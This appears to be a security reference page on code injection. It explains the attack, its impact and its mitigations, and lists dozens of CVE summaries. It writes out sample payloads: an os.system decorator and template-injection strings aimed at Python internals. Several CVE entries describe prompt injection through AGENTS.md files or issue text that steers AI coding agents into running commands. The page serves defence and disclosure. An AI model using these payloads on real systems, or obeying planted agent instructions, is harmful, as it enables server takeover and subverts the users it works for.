Code Injection
Code injection occurs when an application accepts user input and passes it directly into a language interpreter or evaluator without proper sanitization.
How It Works
Code injection occurs when an application accepts user input and passes it directly into a language interpreter or evaluator without proper sanitization. Unlike command injection (which targets the OS shell), code injection exploits the application's own scripting engine—Python's eval(), PHP's eval(), JavaScript's eval(), Ruby's instance_eval(), or similar dynamic execution functions. The attacker crafts input that, when interpreted, executes arbitrary code within the application's runtime context.
Common attack vectors include server-side template engines where user input reaches expression evaluators, configuration files that are dynamically loaded and executed, code validators that ironically execute the code they're supposed to check, and endpoints that process serialized objects or callable definitions. In Python applications, decorators evaluated at class definition time present particularly dangerous targets since they execute before any runtime validation occurs.
The exploitation chain typically begins with identifying an endpoint that processes structured input—API parameters, file uploads, configuration snippets. The attacker then crafts payloads that break out of intended data contexts into executable code contexts. For instance, injecting @os.system('whoami') as a decorator definition, or embedding {{ ''.__class__.__mro__[1].__subclasses__() }} in template syntax to access Python internals and escalate to operating system commands.
Impact
- Complete server compromise — execute arbitrary Python, PHP, Ruby, or JavaScript code with application privileges
- Operating system command execution — break out from language runtime to system shell via subprocess calls
- Data exfiltration — read database credentials, environment variables, source code, and business data
- Persistence establishment — modify application files, inject backdoors, create scheduled tasks
- Lateral movement — leverage server access to attack internal network resources and connected services
Real-World Examples
A critical vulnerability in Langflow, a popular AI workflow framework with over 50,000 GitHub stars, exposed an unauthenticated /api/v1/validate/code endpoint meant to check Python code safety. Attackers discovered they could inject malicious decorators into class definitions. Since Python evaluates decorators at class definition time-before the AST validation logic even ran-the payload executed immediately when passed to exec(). This provided complete remote code execution without authentication.
Web template engines frequently suffer from code injection when developers allow user content in template expressions. An attacker might inject {{7*7}} to test for evaluation, then escalate to {{config.items()}} to dump Flask configuration, ultimately reaching {{''.__class__.__bases__[0].__subclasses__()}} to navigate Python's object hierarchy and invoke system commands.
Configuration management systems that dynamically import or evaluate user-supplied configuration have enabled attackers to inject executable code disguised as YAML anchors, JSON with embedded expressions, or INI files with interpreted sections.
Mitigation
- Eliminate dynamic code execution — refactor to use data-driven approaches instead of
eval(),exec(),Function(), or similar constructs - Abstract Syntax Tree (AST) allowlisting — if code execution is unavoidable, parse input into AST and validate against a strict allowlist of permitted operations before execution
- Sandboxed execution environments — use restricted interpreters (Python's RestrictedPython), containers, or separate processes with minimal privileges
- Remove or authenticate debug/validation endpoints — code validators and test endpoints are prime targets
- Input type enforcement — accept only serialized data formats (JSON, Protocol Buffers) that cannot contain executable code
- Defense in depth — run application with minimal OS privileges, use network segmentation, monitor for unusual subprocess creation
Recent CVEs (4842)
Arbitrary PHP code execution in Twig templating engine versions 3.15.0 through 3.25.x allows attackers who control template source to inject raw PHP into the compiled template via the `_self.(<string>)` dynamic-attribute macro-reference path, fully bypassing the SandboxExtension. The flaw executes injected code at template-load time, before any SecurityPolicy check runs, rendering even a globally-enabled empty allowlist sandbox ineffective. No public exploit identified at time of analysis, but the vendor advisory describes the bypass mechanism in enough detail that PoC development is straightforward.
PHP code injection in Twig template engine versions before 3.26.0 allows attackers controlling template names in `{% use %}` tags to break out of compiled cache file string literals and execute arbitrary PHP code. The flaw bypasses the Twig sandbox entirely because `SecurityPolicy` unconditionally permits `{% use %}` regardless of `allowedTags` configuration. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-7p85-w9px-jpjp) discloses the full exploitation primitive.
Transcript malleability in the Plonky3 p3-challenger crate (MultiField32Challenger) allows a malicious prover to craft distinct observation streams that collapse to identical Fiat-Shamir challenges, breaking the soundness binding of the SNARK transcript. Affected versions are p3-challenger < 0.4.3 and 0.5.0-0.5.2, with fixes shipped in 0.4.3 and 0.5.3. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV; risk is primarily to ZK proof system integrity rather than confidentiality.
Unsafe default code execution in InternLM LMDeploy (<=0.12.3) lets a malicious Hugging Face model repository run arbitrary Python on the host whenever a user loads it through any LMDeploy CLI (serve, calibrate, gptq, awq). The library hardcodes transformers.AutoConfig.from_pretrained(..., trust_remote_code=True) in get_model_arch and related helpers with no flag, env var, or warning to opt out, overriding HF Transformers' default-secure stance. No public exploit identified at time of analysis, and exploitation requires the user to load an untrusted repo, so risk is hardening-level rather than network-reachable RCE.
Arbitrary code execution in InternLM lmdeploy <= 0.12.3 occurs because trust_remote_code=True is hardcoded across HuggingFace model-loading call sites in lmdeploy/archs.py and lmdeploy/utils.py. An attacker who can influence the model_path passed to an lmdeploy serving process can point it at a malicious HuggingFace repository, causing Transformers to download and execute attacker-controlled Python code with the privileges of the serving daemon. Publicly available exploit code exists in the GHSA advisory, and an upstream fix has been merged via PR #4511 (fixed in 0.13.0).
Catalog zone transfer failure in PowerDNS Authoritative can be triggered by a high-privileged remote attacker who injects insufficiently validated member zone data, causing the catalog zone transfer mechanism to abort and preventing secondary nameservers from receiving zone updates. The impact is a targeted denial-of-service against DNS zone replication infrastructure, affecting any deployment using catalog zones (RFC 9432). No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV.
LDAP filter injection in Netatalk 2.1.0 through 4.4.2 enables an authenticated remote attacker to manipulate LDAP query logic, potentially reading or modifying directory entries beyond their authorization scope. The CVSS score of 4.2 (Medium) reflects real but bounded impact - high attack complexity and a requirement for low-privilege authentication constrain opportunistic exploitation. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog.
Unauthenticated remote code execution in phenixdigital phoenix_storybook 0.5.0 through versions before 1.1.0 allows attackers to execute arbitrary Elixir code on the server by abusing the psb-assign WebSocket event to inject HEEx template expressions. The flaw stems from attribute values being interpolated verbatim into HEEx templates that are then compiled and evaluated with full Kernel imports and no sandbox. Publicly available exploit code exists via the upstream commit and GHSA advisory, though no public exploit identified at time of analysis for in-the-wild use; CVSS 4.0 score is 9.5.
Code injection in Mesalvo Meona Client Launcher Component (through 19.06.2020 15:11:49) and Meona Server Component (through 2025.04 5+323020) allows an authenticated, low-privileged attacker to execute code on other users' systems via crafted input that crosses a scope boundary, with user interaction required on the victim side. CVSS 9.0 reflects the cross-user/cross-system impact (Scope:Changed) and full CIA compromise; no public exploit identified at time of analysis. The product is a clinical/healthcare workflow platform, so successful exploitation can pivot between hospital workstations and the server tier.
DNS cache poisoning in NLnet Labs Unbound 1.25.0 and earlier allows an adjacent-network attacker to inject malicious resource records into the resolver's cache by exploiting insufficient validation of authority-section RRSets. By attaching forged non-NS RRSets (such as MX records) with accompanying address records in spoofed or fragmented DNS replies, an attacker can trick Unbound into caching poisoned entries when the authority RRSet carries sufficient trust as in-zone delegation data. Publicly available proof-of-concept exploit code exists (CVSS 4.0 E:P); this is a complement fix to CVE-2025-11411, meaning systems that patched the prior vulnerability but have not upgraded to 1.25.1 remain exposed.
Object injection in Drupal Core across branches 8.0.0 through 11.3.x allows a network-accessible, highly privileged authenticated user to manipulate dynamically-determined object attributes, with potential full compromise of confidentiality, integrity, and availability. The CVSS vector (AV:N/AC:H/PR:H) confirms this is a network-reachable flaw but imposes steep prerequisites: administrator-level access and high attack complexity. No public exploit code or confirmed active exploitation has been identified at time of analysis.
Remote code execution in Eclipse GlassFish allows attackers with administrative access to the Administration Console to execute arbitrary operating system commands as the application service user. The flaw stems from improper input handling in admin panel requests (CWE-94), and while CVSS rates it 9.1 due to scope change and full CIA impact, exploitation requires high privileges (PR:H). No public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Authenticated code injection in Apache OFBiz versions prior to 24.09.06 allows remote attackers with low-privileged accounts to execute arbitrary code via improperly neutralized directives in dynamically evaluated expressions. The flaw combines CWE-94 code injection with eval injection, yielding full confidentiality, integrity, and availability impact (CVSS 8.8). No public exploit identified at time of analysis, and EPSS rates near-term exploitation at 0.03% (8th percentile), but SSVC flags the issue as automatable, raising the risk of scripted abuse once a POC emerges.
Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue.
Improper Control of Generation of Code ('Code Injection') vulnerability in email services of Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue.
Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue.
An issue was discovered in ModelScope 1.25.0 allowing attackers to execute arbitrary code via crafted module listed in the configuration file (dey_mini.yaml) under the key ['nnet']['module'].
Arbitrary code execution in Scalar Astro v0.1.13 allows remote unauthenticated attackers to upload malicious SVG files through the scalar_url query parameter of the Scalar Proxy endpoint. The flaw stems from inadequate validation in the proxy's file handling logic and, per CVSS, requires no authentication or user interaction, though EPSS rates real-world exploitation probability at only 0.02%. No public exploit identified at time of analysis, though a related XSS/Open-Redirect proof-of-concept repository is referenced.
Remote code execution in the amazon-redshift-python-driver (versions prior to 2.1.14) allows a malicious or compromised Redshift server, or a man-in-the-middle attacker positioned on the network path, to execute arbitrary Python code on any client that connects. The root cause is unsafe use of Python's eval() against untrusted server-supplied data inside the vector_in() function. No public exploit identified at time of analysis, but the CVSS 4.0 base score of 9.3 and PR:N/UI:N vector make this a high-priority client-side supply-chain-style risk.
CouchDB reduce injection in Budibase's V1 Views API (POST /api/views) allows authenticated Builder-role users to embed arbitrary JavaScript into CouchDB design document reduce functions via the unsanitized `calculation` parameter, resulting in code execution within CouchDB's SpiderMonkey sandbox on every subsequent view query. Affected versions are all releases of @budibase/server prior to 3.38.1, confirmed by GHSA-363w-hvwh-w7m6. No public exploit has been identified at time of analysis, and no CISA KEV listing exists, though the advisory includes detailed reproduction steps that substantially lower the exploitation barrier for users who already hold Builder privileges.
Pre-authenticated server-side template injection in Verbb Formie (a forms plugin for Craft CMS) allows unauthenticated remote attackers to submit crafted values into Hidden fields configured with a Custom default value, which are then evaluated as Twig during submission handling. Successful exploitation can lead to arbitrary code execution and full compromise of the Craft site depending on template sandbox behavior. No public exploit identified at time of analysis, though the GitHub Security Advisory GHSA-x7m9-mwc2-g6w2 and patch commit are publicly disclosed.
Remote code execution in ChromaDB Python (version 1.0.0 and later) allows unauthenticated attackers to execute arbitrary code on the server by submitting a malicious model repository with trust_remote_code enabled via the /api/v2/tenants/{tenant}/databases/{db}/collections endpoint. The flaw carries a maximum CVSS 4.0 score of 10.0 and was disclosed publicly by HiddenLayer; no public exploit identified at time of analysis, though detailed research has been published.
Code injection vulnerability in the Command-Line Client of P4 Server (Helix Core) prior to version 2025.2 Patch 2 allows remote attackers to execute arbitrary code. The vulnerability requires user interaction but no authentication, with a CVSS 7.7 score indicating high impact across confidentiality, integrity, and availability. Perforce has released a patch in version 2025.2 Patch 2.
Metric injection in the Perl module Net::Statsd::Lite through version 0.10.0 allows remote attackers to inject arbitrary StatsD metrics by smuggling control characters (CRLF) into metric names or values that the library forwards without sanitization. The flaw was disclosed on the oss-security mailing list on 2026-05-18 by maintainer Robert Rothenberg, and no public exploit identified at time of analysis; EPSS is very low (0.03%, 8th percentile), reflecting limited mass-exploitation interest in a niche telemetry library.
Metric injection in the Perl module Net::Statsd::Tiny before version 0.3.8 allows remote attackers to inject arbitrary statsd metrics by smuggling newline, colon, or pipe characters through untrusted metric names or set values. The CVSS 8.2 score reflects high integrity impact from forged telemetry, and while a vendor patch is available, no public exploit has been identified at time of analysis.
ACL Analytics versions 11.x through 13.0.0.579 contain an arbitrary code execution vulnerability that allows attackers to execute arbitrary commands by leveraging the EXECUTE function. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
python jsonpickle 2.0.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary Python commands by deserializing malicious JSON payloads containing py/repr objects. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Metric injection in Net::Statsd::Lite (Perl) affects all releases before v0.9.0, allowing unauthenticated remote attackers to inject arbitrary statsd metrics by embedding newline, colon, or pipe characters into metric names derived from untrusted input. Because the statsd wire protocol uses these characters as record separators and field delimiters, an unsanitized metric name can smuggle additional forged metrics into the UDP stream transmitted to a statsd daemon, corrupting monitoring and telemetry data. No public exploit code exists at time of analysis and the EPSS score of 0.01% (1st percentile) indicates negligible observed exploitation activity; however, the patch diff makes exploitation trivially constructible by any attacker who can influence metric name values in a vulnerable application.
Schlix CMS 2.2.6-6 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious extension packages through the block. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Remote code execution in MCP Calculate Server versions before 0.1.1 allows unauthenticated attackers to execute arbitrary Python code via unsanitized mathematical expressions passed to eval(). The vulnerability stems from processing user-supplied math expressions without input validation, enabling injection of malicious Python code. While no public exploit or active exploitation has been identified, the network-accessible attack vector and lack of required authentication make this a critical risk for exposed instances.
Code injection in Apache Flink's SQL engine allows authenticated users to execute arbitrary code on TaskManagers through malicious SQL queries. The vulnerability affects JSON functions in versions 1.15.0+ and LIKE expressions with ESCAPE clauses in versions 1.17.0+, where user-controlled strings are interpolated into generated Java code without proper escaping. Apache has released patches in versions 1.20.4, 2.0.2, 2.1.2 and 2.2.1.
Terminal escape sequence injection in GitHub CLI 1.6.0 through 2.91.x allows authenticated attackers with pull request creation rights to inject malicious terminal control sequences into Actions workflow logs. When victims execute 'gh run view --log' or 'gh run view --log-failed' to inspect workflow runs, unsanitized escape sequences replay in their terminal, enabling window title manipulation, on-screen content alteration, or arbitrary command execution in vulnerable emulators like GNU screen. The attack requires low complexity and user interaction (victim must view logs), with impact limited to terminal integrity. CVSS score of 3.5 reflects low-severity integrity impact, though real-world risk varies significantly by terminal emulator capabilities. No active exploitation confirmed at time of analysis.
Remote attackers can execute arbitrary code on Oinone Pamirs 7.0.0 servers by sending malicious script expressions to the ScriptRunner.run() method, which evaluates untrusted input without sandboxing. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms this is remotely exploitable without authentication against default configurations. No public exploit identified at time of analysis, but SSVC marks this as automatable with partial technical impact. EPSS data unavailable. The vulnerability enables both information disclosure (C:L) and integrity compromise (I:L) according to CVSS, creating a pathway for initial access and potential privilege escalation.
Authenticated remote code execution in ORSEE 3.1.0 allows low-privileged users to execute arbitrary PHP code on the server by submitting participant profile field values prefixed with 'func:', which are passed unsanitized into eval() calls within tagsets/participant.php and tagsets/options.php. Only version 3.1.0 is confirmed affected; ORSEE is a niche academic tool used in economic research labs, limiting broad attack surface but making unpatched deployments attractive targets for insider threat or compromised-credential scenarios. No public exploit identified at time of analysis beyond a published proof-of-concept writeup on Medium, and EPSS sits at 0.06% (18th percentile), reflecting the narrow deployment footprint.
Local code execution in electerm 3.0.6 through 3.8.8 allows any same-user process to send a crafted JSON payload to electerm's single-instance IPC socket/pipe, causing the application to open tabs with attacker-controlled exec paths, arguments, environment variables, and post-connect scripts that spawn arbitrary local processes. No public exploit identified at time of analysis, but the GHSA advisory and patch commit confirm the vulnerability is real, scored CVSS 4.0 9.3 (Critical), and fixed in version 3.9.0 by filtering dangerous tab properties on the IPC boundary.
Remote code execution in DeepSeek-TUI (Rust CLI tool for AI-assisted development) allows unauthenticated attackers to execute arbitrary shell commands on developer workstations via prompt injection in project files. When a developer opens a malicious repository and creates any task using the task_create tool, spawned sub-agents inherit insecure defaults (allow_shell=true, auto_approve=true) that enable silent shell execution without user approval. The attack leverages project files like AGENTS.md to inject malicious instructions disguised as documentation standards, causing the AI agent to execute attacker-controlled commands. Publicly available exploit code exists (full PoC in advisory). CVSS 9.6 reflects scope change (C) and user interaction requirement (UI:R), indicating high severity conditional on social engineering. No EPSS or KEV data available; real-world risk depends on DeepSeek-TUI adoption in developer workflows.
Remote code execution in DeepSeek-TUI versions 0.3.0 through 0.8.22 allows malicious repository owners to execute arbitrary code on developer workstations without user approval. The vulnerability chains two attack primitives: (1) the run_tests tool auto-executes cargo test with ApprovalRequirement::Auto, compiling and running arbitrary Rust code in test files, build scripts, and proc macros; (2) the AGENTS.md file is automatically loaded into the LLM system prompt and can inject instructions directing the model to invoke run_tests at session start. Publicly available exploit code exists demonstrating full attack chain from repository clone to remote code execution. Fixed in version 0.8.23 released 2025. CVSS 9.6 reflects network attack vector with scope change, though exploitation requires user interaction (opening the malicious repository).
Code execution in Electerm (npm package, versions <= 3.8.8) allows attackers to achieve persistent local-pty code execution by tricking users into importing malicious bookmark JSON files or by compromising configured sync targets (Gist/WebDAV). The flaw stems from unsafe handling of bookmark fields (`exec*`) and global config entries, which are executed when a bookmark is opened or when sync is applied. No public exploit identified at time of analysis, and no vendor-released patch is identified at time of analysis.
Script injection in SanitizerAPI in Google Chrome on Android prior to 148.0.7778.168 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: High)
Crabbox versions before 0.12.0 leak local secrets through environment variable forwarding during remote command execution. When users run commands against malicious or compromised repositories, attackers exploit overly permissive environment variable allowlisting in repository-local configuration files to exfiltrate API tokens, cloud credentials, and broker tokens into the remote execution environment. The vendor released v0.12.0 on May 12, 2026 with fixes including `--allow-env` explicit allowlisting and `--env-from-profile` for safer secret forwarding. No public exploit identified at time of analysis, though the attack surface is straightforward for attackers controlling repository configuration.
Account takeover in ApostropheCMS password reset flow allows remote attackers to steal password reset tokens via Host header injection. When apos.baseUrl is not configured (common in development and some production deployments), the password reset mechanism trusts the attacker-controlled HTTP Host header to construct reset URLs, causing victims to receive legitimate reset emails with links pointing to attacker domains. Clicking the link delivers valid reset tokens to the attacker, enabling full account compromise. CVSS 8.1 (High) with network attack vector, low complexity, and no privileges required. No public exploit identified at time of analysis, though the vulnerability is straightforward to exploit given the detailed technical disclosure in the GitHub security advisory.
Remote code inclusion in Yordam Library Automation System versions 19.5 through 22.0 allows unauthenticated attackers to execute arbitrary code with high integrity and confidentiality impact via user interaction. The vulnerability was reported by Turkey's National Cyber Security Directorate (USOM), indicating potential targeting of Turkish government or educational institutions using this library management software. With network-accessible attack vector and low complexity (CVSS AV:N/AC:L), this represents a significant risk to organizations running unpatched versions despite requiring user interaction (UI:R).
Remote code execution in HuggingFace Diffusers library (versions < 0.38.0) allows attackers to execute arbitrary Python code when victims load malicious pipelines from Hugging Face Hub repositories. The vulnerability bypasses the trust_remote_code=True safeguard through a type coercion flaw where None values are interpolated as 'None.py' filenames. Attackers can achieve silent code execution by publishing repositories containing a malicious None.py file alongside legitimate-looking configuration, requiring only that victims call DiffusionPipeline.from_pretrained() on the attacker's repository. EPSS data not available; no public exploit identified at time of analysis. Vendor-released patch: version 0.38.0.
Argument injection in the n8n workflow automation platform's Git node allows authenticated users with workflow edit privileges to inject CLI flags into the Git Push operation, enabling arbitrary file read from the n8n server and potentially full host compromise. The flaw affects n8n versions prior to 1.123.43, 2.20.7, and 2.22.1, and is rated CVSS 9.4 (4.0) with no public exploit identified at time of analysis. EPSS is low at 0.04% (14th percentile), and the bug is classified under CWE-88 (Argument Injection).
Remote code execution in Archon 0.1.0 enables attackers to execute arbitrary commands and steal API keys when victims access a malicious HTML page. The attack exploits insufficient input validation (CWE-94) to control the Archon UI, run prompts on behalf of authenticated users, and exfiltrate all information displayed in the interface. With EPSS score of 0.04% (13th percentile) and no confirmed active exploitation, this represents a web-to-client attack requiring social engineering but offering significant post-exploitation capabilities once triggered.
Remote code execution in CoreShop's GitHub Actions CI/CD pipeline allows unauthenticated attackers to compromise the build infrastructure and exfiltrate repository secrets by submitting a malicious pull request. The vulnerability stems from the dangerous combination of pull_request_target trigger with unverified code checkout, enabling attackers to execute arbitrary commands (bin/console) on GitHub-hosted runners with access to sensitive credentials including PIMCORE_SECRET and PIMCORE_PRODUCT_KEY. This 'Pwn Request' attack pattern (CWE-94: Code Injection) affects version 5.0.0 with no vendor patch currently released. The attack requires zero authentication (PR:N) and low complexity (AC:L), representing a critical supply chain security risk for organizations using CoreShop.
HTML and JavaScript injection via email notifications in GitLab CE/EE (versions 15.11 through 18.11.2) allows an authenticated low-privileged user to deliver malicious content to other users' inboxes by embedding unsanitized markup into platform-generated notifications. The attack crosses a scope boundary (S:C in CVSS) because the injected code executes in the recipient's email client or browser context rather than GitLab itself, enabling phishing, credential harvesting, or session theft against targeted users. No public exploit has been identified at time of analysis and SSVC signals no active exploitation, though the broad version range - spanning over three years of releases - expands the exposed population significantly.
HTTP response header injection in cPanel, WHM, and WP Squared allows unauthenticated remote attackers to inject arbitrary headers via the unsanitized `status` query parameter of the `/unprotected/nova_error` endpoint. CVSS 8.3 reflects the changed scope (S:C) with low impact across confidentiality, integrity, and availability, consistent with CRLF-style header injection that can pivot into cache poisoning, session fixation, or open redirect chains. No public exploit identified at time of analysis, and EPSS is low at 0.07%, but a vendor patch is already available.
Authenticated remote code execution in CubeCart v6 prior to 6.7.3 allows an admin with documents-edit permission to embed raw PHP into the Invoice Editor template, which is later written to a predictable files/print.<md5>.php path that the bundled .htaccess explicitly exposes to unauthenticated visitors. SSVC rates technical impact as total and a POC exists, though EPSS remains very low (0.04%) and the issue is not on CISA KEV - no public exploit identified at time of analysis beyond researcher disclosure.
Authenticated server-side template injection in CubeCart v6 prior to 6.7.0 allows administrative users to achieve remote code execution by injecting Smarty template syntax into multiple admin-facing modules including Email Templates, Invoices, Documents, and Contact Forms. The flaw stems from evaluating user-supplied content through the Smarty engine without enabling Smarty Security Policies, granting OS-level command execution on the underlying server. Currently no public exploit identified at time of analysis, EPSS is very low at 0.04%, and the issue is not on CISA KEV.
Authenticated server-side template injection in CubeCart v6 before 6.7.0 lets administrators escape the Smarty template sandbox and invoke native PHP functions through modules such as Email Templates and Documents. Attackers can call readgzfile() to exfiltrate configuration secrets and error_log() with message_type=3 to drop a PHP webshell, yielding full remote code execution. No public exploit identified at time of analysis, but a SSVC 'poc' status and an upstream commit hardening the Smarty allowlist indicate the technique is documented.
Content injection in Palo Alto Networks Broker VM 30.0 (versions prior to 30.0.24) allows an authenticated administrator with local access to inject arbitrary content into certain administrative fields within the appliance. The vulnerability carries a CVSS 4.0 score of 1.1, reflecting its highly constrained exploitation prerequisites: local access, low-privilege authentication, and limited integrity impact with no confidentiality or availability consequences. No public exploit identified at time of analysis, and SSVC assessment confirms no observed exploitation, making this a low-urgency finding for most organizations.
Local code injection in Palo Alto Networks Prisma Browser on macOS lets an authenticated non-admin user abuse an exposed AppleScript/Apple Event handler to send unauthorized commands to the browser, with high impact on confidentiality and integrity. No public exploit identified at time of analysis, and EPSS is very low (0.02%), but SSVC rates the technical impact as total once the local foothold exists. Affects all Prisma Browser releases prior to 146.16.6.165 on macOS.
Command injection in TeamViewer DEX Platform On-Premises (formerly 1E DEX Platform On-Premises) prior to version 9.2 allows authenticated low-privileged users to execute elevated commands on endpoints managed by the platform. The vulnerability stems from improper input validation (CWE-20) within specific platform instructions, enabling a user holding only 'questioner' privileges to escalate their effective impact to arbitrary command execution on connected devices. No public exploit exists and EPSS is low (0.08%), though SSVC rates Technical Impact as 'total', reflecting the downstream risk to managed endpoints despite the bounded CVSS partial-impact scores.
NGINX Open Source configured to proxy HTTP/2 traffic with proxy_http_version set to 2 combined with proxy_set_body allows remote unauthenticated attackers to inject frame headers and payload bytes to upstream peers, enabling potential header injection or request manipulation attacks. The vulnerability affects default configurations without requiring authentication or user interaction, with CVSS 5.8 indicating moderate integrity impact across networked systems. No public exploit code or active exploitation has been confirmed at this time.
Unauthenticated remote code execution in Mapfish Print (org.mapfish.print) allows attackers to execute arbitrary code via a code injection flaw in the Dynamic table feature. The vulnerability carries a CVSS 4.0 score of 9.3 with network-accessible, low-complexity exploitation requiring no privileges or user interaction. No public exploit identified at time of analysis, though the GHSA advisory and four parallel patched release lines indicate vendor-confirmed severity.
ChurchCRM is an open-source church management system. Prior to 7.3.2, The fix for CVE-2026-39337 is incomplete. The pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard via unsanitized DB_PASSWORD remains fully exploitable This vulnerability is fixed in 7.3.2.
Authenticated administrators with Admin Console access to FileMaker Cloud can execute arbitrary operating system commands on the underlying host by bypassing front-end restrictions on OS Script schedule types. This vulnerability affects all FileMaker Cloud versions prior to 2.22.0.5 and requires high-privilege administrative credentials to exploit. Despite the network attack vector and total technical impact (full system compromise), the low EPSS score (0.13%, 32nd percentile) and SSVC assessment indicating no observed exploitation suggest this is not being actively exploited in the wild, likely due to the high privilege requirement limiting the attacker pool to malicious insiders or compromised admin accounts.
The The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.9.2.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
Wing FTP Server 8.1.2 contains an authenticated remote code execution vulnerability in the session serialization mechanism that allows authenticated administrators to inject arbitrary Lua code through the domain admin mydirectory field. Attackers can exploit unsafe serialization of session values into Lua source code without proper escaping of closing delimiters, causing the injected code to be executed when the poisoned session is loaded via loadfile().
nnU-Net is a semantic segmentation framework that automatically adapts its pipeline to a dataset. Prior to 2.4.1, the nnU-Net Issue Triage workflow in .github/workflows/issue-triage.yml is vulnerable to Agentic Workflow Injection. The workflow sets allowed_non_write_users: ${{ github.event.issue.user.login }}, which means any logged-in GitHub user who opens an issue can reach this agentic workflow with attacker-controlled content. Untrusted issue title and body content are embedded directly into the prompt of anthropics/claude-code-action, and the workflow then runs a command-capable Claude agent with permission to comment on and relabel the current issue via gh. Because this workflow is triggered automatically on issues.opened, an external attacker can submit a crafted issue that steers the agent beyond its intended issue-triage purpose and influences authenticated issue actions. This vulnerability is fixed in 2.4.1.
PowerSYSTEM Center email notification service is affected by a CRLF injection vulnerability when using SMTPS communication.
SPIP versions prior to 4.4.14 contain a remote code execution vulnerability in the public space that is limited to certain nginx configurations, allowing attackers to execute arbitrary code in the context of the web server. Attackers can exploit this vulnerability through specific nginx configuration scenarios to achieve code execution, and this issue is not mitigated by the SPIP security screen.
SPIP versions prior to 4.4.14 contain a remote code execution vulnerability in the private space that allows attackers to execute arbitrary code in the context of the web server. Attackers can exploit this vulnerability to achieve code execution that bypasses the SPIP security screen protections.
Improper control of generation of code ('code injection') in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.
Improper control of generation of code ('code injection') in Microsoft Data Formulator allows an unauthorized attacker to execute code over a network.
Argument injection in Fortinet FortiDeceptor 5.0 through 6.0.2 allows authenticated administrators with read-only permissions to read arbitrary log files via crafted HTTP requests, exposing sensitive system and audit logs. The vulnerability requires valid admin credentials but no elevated privileges, making it accessible to lower-privileged authenticated users. No public exploit code or active exploitation has been confirmed at time of analysis.
Code injection in protobufjs-cli's pbjs static generator allows attackers who control protocol buffer schemas to inject malicious JavaScript code into generated output files. The vulnerability affects npm packages protobufjs-cli versions ≤1.2.0 and 2.0.0-2.0.1, with patches released in versions 1.2.1 and 2.0.2. Exploitation requires low complexity with authenticated network access and user interaction (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C), achieving high confidentiality and integrity impact but no availability impact. No CISA KEV listing or public exploit code identified at time of analysis, though GitHub advisory confirms the vulnerability with released patches.
Remote code execution in protobufjs (npm package) versions ≤7.5.5 and 8.0.0-8.0.1 allows attackers to inject and execute arbitrary JavaScript by supplying a malicious protobuf schema with crafted default values in bytes fields. When applications load untrusted protobuf descriptors and call toObject() with defaults enabled, attacker-controlled expressions are emitted into generated conversion functions and executed in the application context. Vendor-released patches are available in versions 7.5.6 and 8.0.2. No public exploit code identified at time of analysis, though the vulnerability is straightforward to weaponize given the clear preconditions in the advisory.
Prototype pollution in protobuf.js type lookup tables enables remote code execution via code injection into generated encode/decode functions. Affects npm package protobuf.js versions ≤7.5.5 and 8.0.0-8.0.1. Exploitation requires chaining with a separate prototype pollution vulnerability-applications must first allow Object.prototype pollution, then invoke protobufjs code generation on attacker-influenced schemas. Vendor-released patches available (v7.5.6, v8.0.2). CVSS 8.1 (High) reflects network vector but high attack complexity (AC:H) due to multi-step prerequisite. No evidence of active exploitation (not in CISA KEV), public exploit code not identified at time of analysis.
Authentication-layer injection in OX Dovecot Pro (versions up to and including 2.4.3 and 3.1.4) arises from a flaw in the 'safe' template filter: when 'safe' is applied during variable expansion, every subsequent pipeline stage on the same string inherits the 'safe' designation, so attacker-controlled data that should be escaped is passed through unescaped. Because variable expansion is used to build authentication backend queries, this enables SQL or LDAP injection by remote unauthenticated attackers. There is no public exploit identified at time of analysis, and EPSS exploitation probability is negligible (0.01%, 2nd percentile).
Code injection in SAP Application Server ABAP for SAP NetWeaver and ABAP Platform allows authenticated attackers to execute arbitrary code for subscribed channel users by sending specially crafted inputs. The vulnerability has low integrity impact with no confidentiality or availability consequences. CVSS 4.3 (low severity) reflects the requirement for authenticated access, but the ability to affect other users elevates practical risk in multi-tenant environments.
Remote code execution in Kubectl MCP Server v1.1.1 allows unauthenticated network attackers to execute arbitrary commands on systems running the vulnerable server through crafted HTML-based exploitation vectors. Despite a critical 9.8 CVSS score, EPSS rates exploitation likelihood at only 0.02% (4th percentile), suggesting limited real-world targeting thus far. The vulnerability is classified as CWE-94 (Code Injection), affecting an open-source Model Context Protocol (MCP) server implementation for Kubernetes management. No CISA KEV listing indicates absence of confirmed widespread exploitation at time of analysis.
Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.
